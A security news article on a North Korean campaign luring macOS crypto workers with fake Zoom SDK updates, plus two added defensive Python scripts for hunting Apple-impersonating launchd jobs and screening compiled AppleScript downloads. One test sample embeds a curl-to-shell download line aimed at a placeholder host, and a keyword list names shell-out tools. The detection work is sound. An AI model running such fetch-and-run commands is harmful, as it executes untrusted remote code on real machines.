North Korean Sapphire Sleet Targets macOS Users With Fake Zoom Update Prompts to Steal Crypto Wallets
North Korean state-backed group Sapphire Sleet is running a social engineering campaign that uses fake software update prompts to trick macOS users into handing over passwords and cryptocurrency wallet data.

A dangerous new cyber campaign is putting macOS users at serious risk, and it does not rely on software bugs to do its damage. Instead, the attackers trick people into handing over their own passwords and sensitive data by making everything look completely normal. What appears to be a routine software update turns out to be a carefully crafted trap, and by the time a victim realizes something is wrong, the damage may already be done.
The group behind this activity is known as Sapphire Sleet, a North Korean state-backed threat actor active since at least March 2020. Their targets are not random. They focus almost entirely on people involved in cryptocurrency, venture capital, and blockchain-related businesses. The core goal is to steal digital assets and financial information from high-value individuals and organizations around the world.
Analysts at Microsoft said in a report shared with Cyber Security News that the campaign began in early 2026 and introduces macOS-specific attack techniques not previously seen from this actor. According to the report, the attack works entirely through social engineering, meaning the hackers convince users to run malicious files themselves rather than exploiting any flaw in the operating system.
The attack begins when a target is contacted on social media or professional platforms by someone posing as a job recruiter. After some back-and-forth, the target is directed to download a file disguised as a Zoom SDK update. The file is a compiled AppleScript rather than an installer: opening it launches macOS Script Editor, a legitimate Apple tool, and the script quietly pulls additional malicious code in the background. The user sees nothing suspicious, only what looks like an ordinary software installation.
Once the malicious script runs on a victim's machine, it silently deploys a fake application called systemupdate.app. This app presents the user with a native-looking macOS password dialog that is visually indistinguishable from a real system prompt. The user is told their password is required to finish the software update, and most people simply type it in without a second thought. After the password is entered, the malware verifies it against the local macOS authentication database. If the credential checks out, it is immediately forwarded to the attackers via the Telegram messaging service.
Beyond stealing credentials, Sapphire Sleet installs multiple backdoors to maintain long-term access. A component named com.apple.cli, a label chosen to blend in with Apple's own launchd jobs, acts as a host monitoring tool that continuously checks in with the attackers' servers. A more advanced backdoor named icloudz loads code directly into memory, leaving little trace on disk and making it considerably harder for security tools to catch. The malware registers a launch daemon so that launchd restarts the backdoor after every system reboot, which means killing the running process alone does not evict it. All stolen data is compressed into archives and uploaded to attacker-controlled servers over port 8443, while credentials are sent separately via the Telegram Bot API.
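Two of the traits above can be hunted for directly: a launchd job carrying an Apple-looking label (such as com.apple.cli) but registered outside Apple's system location or pointing at a non-Apple binary, and outbound traffic to the Telegram Bot API or to port 8443 from a process nobody expects there. The script below is an added example written for this page, not tooling from Microsoft, Apple or the actor. Every plist, program path and flow record in it is a constructed sample, and the rules about which directories count as Apple-owned, the com.apple.exampled job, the CorpVPN allowlist entry and the 203.0.113.10 address are assumptions.

```python
"""Hunt for Apple-impersonating launchd jobs and exfiltration-shaped flows.

Added example, not code from Microsoft, Apple or the threat actor. All paths,
labels and flow records are constructed samples; the directory rules below
are assumptions that fit a stock macOS install."""
import plistlib

# Apple's own daemons ship under the sealed system volume; third-party jobs
# live in /Library/LaunchDaemons. An Apple-style label outside the system
# location is worth a look on its own. (Assumed layout.)
APPLE_DAEMON_DIR = "/System/Library/LaunchDaemons/"
APPLE_BINARY_PREFIXES = ("/System/", "/usr/bin/", "/usr/sbin/",
                         "/usr/libexec/", "/Library/Apple/")
TELEGRAM_API_HOST = "api.telegram.org"  # Telegram Bot API endpoint
# Hypothetical: the processes this environment expects to use TCP 8443.
PORT_8443_ALLOWLIST = {"/Applications/CorpVPN.app/Contents/MacOS/vpnd"}

PLIST_TEMPLATE = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0"><dict>
<key>Label</key><string>{label}</string>
<key>ProgramArguments</key><array><string>{program}</string></array>
<key>RunAtLoad</key><true/>
<key>KeepAlive</key><{keepalive}/>
</dict></plist>"""

# Constructed on-disk samples: {plist path: plist bytes}.
SAMPLE_PLISTS = {
    # Mimics the described com.apple.cli job; the program path is an assumption.
    "/Library/LaunchDaemons/com.apple.cli.plist": PLIST_TEMPLATE.format(
        label="com.apple.cli",
        program="/Users/Shared/.systemupdate.app/Contents/MacOS/systemupdate",
        keepalive="true").encode(),
    # Hypothetical Apple job in the system location with an Apple binary.
    "/System/Library/LaunchDaemons/com.apple.exampled.plist": PLIST_TEMPLATE.format(
        label="com.apple.exampled", program="/usr/libexec/exampled",
        keepalive="false").encode(),
    # Third-party job with a third-party label: not an impersonation.
    "/Library/LaunchDaemons/com.corpvpn.vpnd.plist": PLIST_TEMPLATE.format(
        label="com.corpvpn.vpnd",
        program="/Applications/CorpVPN.app/Contents/MacOS/vpnd",
        keepalive="true").encode(),
}

# Constructed flow records: (process path, destination host, destination port).
SAMPLE_FLOWS = [
    ("/Users/Shared/.systemupdate.app/Contents/MacOS/systemupdate", "api.telegram.org", 443),
    ("/Users/Shared/.icloudz", "203.0.113.10", 8443),  # TEST-NET-3 address, stand-in C2
    ("/Applications/CorpVPN.app/Contents/MacOS/vpnd", "vpn.corp.example", 8443),
    ("/usr/libexec/trustd", "ocsp.apple.com", 443),
]


def launchd_findings(plists):
    """Return [(plist path, label, [reasons])] for com.apple.* labelled jobs
    that are not registered or backed by Apple-owned locations."""
    findings = []
    for path, raw in plists.items():
        job = plistlib.loads(raw)
        label = job.get("Label", "")
        if not label.startswith("com.apple."):
            continue
        args = job.get("ProgramArguments") or []
        program = job.get("Program") or (args[0] if args else "")
        reasons = []
        if not path.startswith(APPLE_DAEMON_DIR):
            reasons.append(f"Apple-style label registered outside {APPLE_DAEMON_DIR}")
        if not program.startswith(APPLE_BINARY_PREFIXES):
            reasons.append(f"program at non-Apple path {program}")
        if reasons and (job.get("RunAtLoad") or job.get("KeepAlive")):
            reasons.append("relaunched by launchd (RunAtLoad/KeepAlive): "
                           "killing the process is not enough, unload the job")
        if reasons:
            findings.append((path, label, reasons))
    return findings


def flow_findings(flows):
    """Return [(process, host, port, reason)] for flows matching the
    described exfiltration channels."""
    findings = []
    for proc, host, port in flows:
        if host == TELEGRAM_API_HOST:
            findings.append((proc, host, port, "Telegram Bot API contact"))
        elif port == 8443 and proc not in PORT_8443_ALLOWLIST:
            findings.append((proc, host, port,
                             "outbound 8443 from non-allowlisted process"))
    return findings


if __name__ == "__main__":
    for path, label, reasons in launchd_findings(SAMPLE_PLISTS):
        print(f"[launchd] {label} ({path})")
        for reason in reasons:
            print("   -", reason)
    for proc, host, port, reason in flow_findings(SAMPLE_FLOWS):
        print(f"[network] {proc} -> {host}:{port}: {reason}")
```

On a real host the plist dictionary would be filled by reading /Library/LaunchDaemons and /Library/LaunchAgents, and the flow records would come from whatever network telemetry is available. Port 8443 is common for legitimate management agents, so the allowlist has to be tuned per environment; the Telegram check needs no tuning on a corporate fleet where no process should be talking to a bot endpoint.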
Microsoft shared its findings with Apple as part of a responsible disclosure process. Apple has since rolled out platform-level protections, including XProtect signature updates and Safari Safe Browsing blocks, to detect and stop infrastructure tied to this campaign. macOS users are strongly encouraged to keep their devices fully updated to benefit from these protections. Microsoft advises users to never run scripts or terminal commands shared through chat messages without approval from a trusted IT team. Organizations should block compiled AppleScript files downloaded from the internet and monitor for unauthorized changes to the macOS TCC database. Anyone managing cryptocurrency assets should rely on hardware wallets and regularly rotate credentials stored in browsers.
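Blocking compiled AppleScript by file extension is easy to bypass with a rename, so a download filter should look at content. Compiled AppleScript files begin with the ASCII magic "FasdUAS", and string literals (a URL, a curl pipeline) survive compilation even though the language keywords are tokenised. The script below is an added example for this page, not Microsoft's or Apple's tooling. The sample file bodies are constructed stand-ins that reproduce only the magic header and a literal, not a real script; the file names, the .invalid URL and the list of shell-out hints are assumptions.

```python
"""Triage downloaded files for compiled AppleScript by content, not extension.

Added example, not Microsoft's or Apple's tooling. The sample bodies are
constructed: only the "FasdUAS" magic and one string literal are reproduced,
and every file name is an assumption."""
import re

APPLESCRIPT_MAGIC = b"FasdUAS"
# Substrings in embedded literals that suggest the script fetches or runs more code.
SHELL_HINTS = ("curl ", "http://", "https://", "| sh", "| bash",
               "base64", "osascript", "chmod +x")


def is_compiled_applescript(data: bytes) -> bool:
    """True when the file carries the compiled-AppleScript magic header."""
    return data.startswith(APPLESCRIPT_MAGIC)


def embedded_strings(data: bytes, min_len: int = 8):
    """Printable-ASCII runs of at least min_len bytes; string literals survive
    compilation even though keywords are tokenised."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.decode("ascii") for m in re.findall(pattern, data)]


def triage(files):
    """files: {path: bytes}. Returns {path: [suspicious literals]} for every
    compiled AppleScript, whatever its extension claims."""
    report = {}
    for path, data in files.items():
        if not is_compiled_applescript(data):
            continue
        report[path] = [s for s in embedded_strings(data)
                        if any(hint in s for hint in SHELL_HINTS)]
    return report


# Constructed samples. The stage-2 URL uses the reserved .invalid TLD.
_FAKE_HEADER = b"FasdUAS 1.101.10\x0e\x00\x00\x00\x04\x00\x00\x00"
_FAKE_PAYLOAD = b"\x00curl -fsSL https://sdk.example.invalid/stage2 | sh\x00"
SAMPLE_FILES = {
    "Downloads/ZoomSDK_Update.scpt": _FAKE_HEADER + _FAKE_PAYLOAD,
    # Same bytes renamed to look like an installer package: still caught.
    "Downloads/ZoomSDK_Update.pkg": _FAKE_HEADER + _FAKE_PAYLOAD,
    # Compiled script with no shell-out literal: reported, but with no hints.
    "Downloads/hello.scpt": _FAKE_HEADER + b"\x00Hello, world\x00",
    # Plain text: not compiled AppleScript.
    "Downloads/release-notes.txt": b"Zoom SDK release notes\n",
}

if __name__ == "__main__":
    for path, hints in triage(SAMPLE_FILES).items():
        print(path, "->", hints or "compiled AppleScript, no shell-out literal found")
```

On a macOS host, build the dictionary from the user's Downloads folder and pair the result with the quarantine attribute (`xattr -p com.apple.quarantine <file>`), which is what marks a file as fetched from the internet. The check covers only compiled scripts; plain-text AppleScript source (.applescript) also opens in Script Editor and would need a separate rule.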